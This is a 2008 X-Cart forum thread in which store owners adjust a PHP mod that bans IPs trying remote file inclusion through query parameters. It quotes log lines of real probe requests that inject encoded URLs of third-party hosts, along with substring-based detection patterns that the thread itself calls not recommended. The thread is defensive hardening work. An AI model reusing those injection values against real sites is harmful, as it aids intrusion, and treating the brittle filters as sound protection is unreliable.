[PATCH] Blocking those pesky hackers
X-Cart forums > X-Cart 4 > Dev Questions
#31 - 06-06-2008, 12:07 AM
Scotty85 (Advanced Member; Join Date: Mar 2008; Posts: 94)
Re: [PATCH] Blocking those pesky hackers

I got it.... for those interested...

In /auth.php change this:
Quote:
if(strpos($v, 'http://')!==false) {

To this:
Quote:
if(strpos($v, 'http')!==false) {

Change:
Quote:
func_add_ip_to_slist($REMOTE_ADDR, 'H');
To this:
Quote:
func_add_ip_to_slist($REMOTE_ADDR, 'M');

Change:
Quote:
if($stop_list = func_query("SELECT * FROM $sql_tbl[stop_list] WHERE ip LIKE '$REMOTE_ADDR' AND reason = 'H'")) {
To this:
Quote:
if($stop_list = func_query("SELECT * FROM $sql_tbl[stop_list] WHERE ip LIKE '$REMOTE_ADDR' AND reason = 'M'")) {


Please note that this is AFTER you apply the patches from the original poster. (This is on a Windows 2003 server.... since it doesn't use the .htaccess file, this is easier than going into IIS every time you wanna add a blocked IP.)
The 'H' and 'M' reflect whichever admin account you normally use to add your blocked IPs. Having it the same as what the mod uses, it covers the ones you add manually as well.

Thanks again for a very cool mod!


Scotty
__________________
Xcart Version 4.1.9
Upgraded to 4.1.10 (clean install with mods added back)
#32 - 06-06-2008, 12:48 AM
Scotty85 (Advanced Member; Join Date: Mar 2008; Posts: 94)
Re: [PATCH] Blocking those pesky hackers

Just curious...

How would you add an "elseif" to that to make it be labeled differently from being done by Admin or by the mod? (how do you make it use 'M' or 'H')
__________________
Xcart Version 4.1.9
Upgraded to 4.1.10 (clean install with mods added back)
#33 - 06-06-2008, 03:46 AM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)
Re: [PATCH] Blocking those pesky hackers

Hi Scotty, a note: be careful blocking other statuses with the stop list. I created status H so that I could be certain only obvious hackers were totally banned from the site. If you use status M (which I believe stands for manual, correct?) that could pose some issues (not saying it *would*, I just haven't looked into any ramifications, so just a word of warning is all).

Regarding checking for http by itself, that means if http is found anywhere in the string, they get banned, and it's probably easier to have http in the middle of a string than http://. To be certain, I would check to ensure the first 4 letters appear as http.

You mentioned having an SEO mod used against you; how so?

Add an elseif for a different label? Can you describe that better?
__________________
-Jon Langevin
WARNING: Unethical developer - NOT RECOMMENDED
See details here
#34 - 06-06-2008, 07:25 AM
Scotty85 (Advanced Member; Join Date: Mar 2008; Posts: 94)
Re: [PATCH] Blocking those pesky hackers

Well... as I posted earlier, Windows servers do not use the .htaccess file at all. My understanding is that when something is added to the stop-list, xcart adds it to the .htaccess file. Is that wrong? In any case, my stop list never worked until your mod came along. At that point, while testing, I found that my manually added IPs still didn't get blocked, but yours actually works! I've always had to go into IIS and block IPs 1-by-1 or by group. Pretty monotonous. That's why I changed it to block status 'M' instead of 'H'. YOURS works, xcart's doesn't. This GREATLY simplifies blocking malicious IPs for me.

As for the label, your mod labels it nicely as a hacker attempt. When adding an IP MANUALLY, it just says "Added by Administrator". I wanted a way (since I'm blocking the manually added IPs as well with your mod) to have blocked IPs that were added automatically by the mod be labeled as hacker attempts like you have it.... and the manually added ones say "added by administrator". By changing the H to M, it labels the IPs automatically added by your mod as "Added by Administrator", the same as a manual add. I want to separate the two and have different labels. But remember, with the way I changed it to work for me on our W2k3 server, ALL blocked IPs are flagged by M. I wanted them to show in the list as blocked by whoever blocked them (the mod, or manually).

Hope this makes sense...
__________________
Xcart Version 4.1.9
Upgraded to 4.1.10 (clean install with mods added back)
#35 - 06-06-2008, 08:21 AM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)
Re: [PATCH] Blocking those pesky hackers

Hi Scotty, .htaccess is not modified by the StopList module.

Additionally, the StopList module is originally intended to block people from the cart, not from the website. My code just hijacked the module a bit to ban hackers from the site more easily.

Regarding the H vs M, in auth.php, change the SQL statement to the following:
PHP Code:
if($stop_list = func_query("SELECT * FROM $sql_tbl[stop_list] WHERE ip LIKE '$REMOTE_ADDR' AND (reason = 'H' OR reason = 'M') ")) {

Also, revert the part that bans them back to how it was:
PHP Code:
func_add_ip_to_slist($REMOTE_ADDR, 'H');

And change the strpos bit to this (to only match http, and ftp, at the beginning of the string):
PHP Code:
if(substr($v, 0, 4)=='http' || substr($v, 0, 3)=='ftp') {
__________________
-Jon Langevin
WARNING: Unethical developer - NOT RECOMMENDED
See details here
#36 - 06-06-2008, 08:55 AM
Scotty85 (Advanced Member; Join Date: Mar 2008; Posts: 94)
Re: [PATCH] Blocking those pesky hackers

Very nice. Works perfectly for me. Thanks for the clarification on the stop list too. I think I was reading a thread about a mod that added the IPs to the .htaccess file. Musta got that confused. Sorry.

By reading your last post, is it safe to assume (ya... I know...) that you could effectively add any flag you wanted?

PHP Code:
if(substr($v, 0, 4)=='http' || substr($v, 0, 3)=='ftp' || substr($v, 0, 6)=='HACKER') {

Or is that all wrong and I should go play with crayons in the corner.
__________________
Xcart Version 4.1.9
Upgraded to 4.1.10 (clean install with mods added back)
#37 - 06-06-2008, 08:59 AM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)
Re: [PATCH] Blocking those pesky hackers

lol, yes, you can use any flag you feel like defining; it will determine them to be a hacker based on the flag, and ban them.
__________________
-Jon Langevin
WARNING: Unethical developer - NOT RECOMMENDED
See details here
#38 - 06-06-2008, 09:02 AM
Scotty85 (Advanced Member; Join Date: Mar 2008; Posts: 94)
Re: [PATCH] Blocking those pesky hackers

Is my syntax correct in the above post?
__________________
Xcart Version 4.1.9
Upgraded to 4.1.10 (clean install with mods added back)
#39 - 06-06-2008, 09:53 AM
Scotty85 (Advanced Member; Join Date: Mar 2008; Posts: 94)
Re: [PATCH] Blocking those pesky hackers

I just got a bunch of these and they were not blocked. Can you take a look and see if there's something we need to change in the mod?

Quote:

Unregistered customer  06-06-2008 12:19:50  06-06-2008 12:19:50  .../home.php?js=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Fedexuq%2F
Unregistered customer  06-06-2008 12:19:52  06-06-2008 12:19:52  .../home.php?js=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fyeni%2Faxiyeba%2Ftebe%2F
Unregistered customer  06-06-2008 12:19:54  06-06-2008 12:19:54  .../home.php?js=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F
Unregistered customer  06-06-2008 12:19:55  06-06-2008 12:19:55  .../manufacturers.php?manufacturerid=304&page=1
Unregistered customer  06-06-2008 12:19:58  06-06-2008 12:19:58  .../manufacturers.php?manufacturerid=http%3A%2F%2Fwww.eddufresne.org%2Fcomponents%2Fkill.com_calendar.backup.kill%2Fkill.ezi.kill%2Foye%2Fekasu%2F&catid=397&dsefu=off
Unregistered customer  06-06-2008 12:19:58  06-06-2008 12:19:58  .../manufacturers.php?manufacturerid=http%3A%2F%2Fwww.foicr.org%2Fwork%2Fmulito%2Fyiqosu%2F&catid=397&dsefu=off
Unregistered customer  06-06-2008 12:32:02  06-06-2008 12:39:45  .../product.php?productid=36186
Unregistered customer  06-06-2008 12:48:23  06-06-2008 12:48:23  .../home.php?cat=444&page=1
Unregistered customer  06-06-2008 12:46:30  06-06-2008 12:46:30  .../product.php?productid=23370
Unregistered customer  06-06-2008 12:19:46  06-06-2008 12:19:46  .../help.php?section=contactus&mode=http%3A%2F%2Fwww.uxbridgerotary.org%2Fsurvey%2Ftmp%2Fisefa%2Fnowu%2Fyocav%2F
Unregistered customer  06-06-2008 12:19:48  06-06-2008 12:19:48  .../help.php?section=contactus&mode=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Focoyo%2Fser%2F
Unregistered customer  06-06-2008 12:19:49  06-06-2008 12:19:49  .../help.php?section=contactus&mode=http%3A%2F%2Fwww.blankner.ocps.net%2Fmedia%2Fyeloc%2Frepaw%2F



Update:
This seems to have taken care of all of it for now. Since none of these are ever used with HTTP in them in this way, I'm pretty sure they're all ok to use. I've bounced all over my site, clicked on froogle links and all..... everything seems to be working fine. I'll add to it as needed.


PHP Code:
if(substr($v, 0, 4)=='http'
    || substr($v, 0, 19)=='manufacturerid=http'
    || substr($v, 0, 9)=='mode=http'
    || substr($v, 0, 7)=='js=http'
    || substr($v, 0, 12)=='section=http'
    || substr($v, 0, 8)=='cat=http'
    || substr($v, 0, 10)=='catid=http'
    || substr($v, 0, 10)=='dsefu=http'
    || substr($v, 0, 9)=='page=http') {
__________________
Xcart Version 4.1.9
Upgraded to 4.1.10 (clean install with mods added back)
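As an added example (not code from this thread or from X-Cart), here is how the "scheme at the start of the value" test intel352 describes in #35 can be applied after URL decoding, so the encoded js=http%3A%2F%2F... and manufacturerid=http%3A%2F%2F... requests in the log above are caught without enumerating every parameter name as the post #39 code does. $REMOTE_ADDR and func_add_ip_to_slist() are the names used in the posts; the sample query strings are constructed.

```php
<?php
// Added example (not from the thread or X-Cart): flag query-string values that
// begin with a remote URL, checked after decoding so js=http%3A%2F%2F... is seen.
// $REMOTE_ADDR and func_add_ip_to_slist() are the names used in the posts above.
// Anchored at the start of the value, so 'http' inside a search term or a
// product description does not trip the check (the false positive raised in #33).
const REMOTE_URL_PATTERN = '~^\s*(?:https?|ftp)://~i';

// Return the names of all parameters whose decoded value starts with a URL.
function find_remote_url_params(string $query_string): array
{
    $hits = [];
    parse_str($query_string, $params);   // one level of %XX decoding
    foreach (flatten_params($params) as $name => $value) {
        // Test the decoded value, and once more decoded for double-encoding
        // (http%253A%252F%252F...), which a single decode would miss.
        if (preg_match(REMOTE_URL_PATTERN, $value)
            || preg_match(REMOTE_URL_PATTERN, rawurldecode($value))) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// parse_str nests a[b]=x into arrays; flatten them so every leaf is checked.
function flatten_params(array $params, string $prefix = ''): array
{
    $flat = [];
    foreach ($params as $key => $value) {
        $path = $prefix === '' ? (string)$key : "$prefix.$key";
        if (is_array($value)) {
            $flat += flatten_params($value, $path);
        } else {
            $flat[$path] = (string)$value;
        }
    }
    return $flat;
}

// Constructed sample query strings modelled on the log lines in post #39.
$samples = [
    'js=http%3A%2F%2Fattacker.example%2Fshell.txt%3F',            // RFI attempt
    'manufacturerid=http%3A%2F%2Fattacker.example%2F&catid=397',   // RFI attempt
    'manufacturerid=304&page=1',                                   // legitimate
    'q=see+http+in+the+middle',                                    // must stay clean
];
foreach ($samples as $qs) {
    // In auth.php, a non-empty result is where func_add_ip_to_slist($REMOTE_ADDR, 'H') belongs.
    $h = find_remote_url_params($qs);
    printf("%-58s -> %s\n", $qs, $h ? 'ban: ' . implode(',', $h) : 'ok');
}
```

Running it prints "ban: js", "ban: manufacturerid", "ok" and "ok" for the four samples, in that order.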
#40 - 06-06-2008, 11:02 AM
intel352 (X-Wizard; Join Date: Dec 2005; Posts: 1,071)
Re: [PATCH] Blocking those pesky hackers

doh, my bad, I was thinking the code was different. While your solution works for now, it's not recommended. I'll post back in a bit with a better solution (I'm upgrading a client site at the moment tho, so it'll be a bit).
__________________
-Jon Langevin
WARNING: Unethical developer - NOT RECOMMENDED
See details here
X-Cart forums © 2001-2020